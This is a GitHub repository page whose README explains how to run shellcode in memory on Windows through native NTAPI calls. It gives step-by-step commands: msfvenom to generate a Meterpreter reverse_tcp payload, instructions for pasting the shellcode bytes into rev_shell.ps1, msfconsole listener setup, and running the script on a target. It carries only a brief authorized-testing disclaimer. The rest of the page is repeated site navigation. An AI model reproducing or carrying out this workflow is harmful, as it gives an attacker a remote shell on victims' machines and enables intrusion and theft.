NTAPI-Based In-Memory Execution

Overview

This project demonstrates in-memory code execution using Windows Native API (NTAPI) calls from ntdll.dll.

Prerequisites

Metasploit Framework (msfvenom + msfconsole)

How It Works

Allocate memory using native system calls
Write payload into allocated memory
Change memory protection to executable
Execute within the current process

Step 1: Generate Shellcode

On the attacker machine:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f ps1

This outputs a byte array. Paste it into rev_shell.ps1 replacing #YOUR_SHELLCODE_HERE:

[Byte[]] $data = 0xfc,0x48,0x83,0xe4,0xf0,...

Step 2: Start the Listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
run

Step 3: Run on Target

.\rev_shell.ps1

⚠️ Disclaimer This project is intended for authorized testing purposes only. Use responsibly and only on systems you have explicit permission to test.

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
ReadMe.md		ReadMe.md
rev_shell.ps1		rev_shell.ps1

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

NTAPI-Based In-Memory Execution

Overview

Prerequisites

How It Works

Step 1: Generate Shellcode

Step 2: Start the Listener

Step 3: Run on Target

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

NTAPI-Based In-Memory Execution

Overview

Prerequisites

How It Works

Step 1: Generate Shellcode

Step 2: Start the Listener

Step 3: Run on Target

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages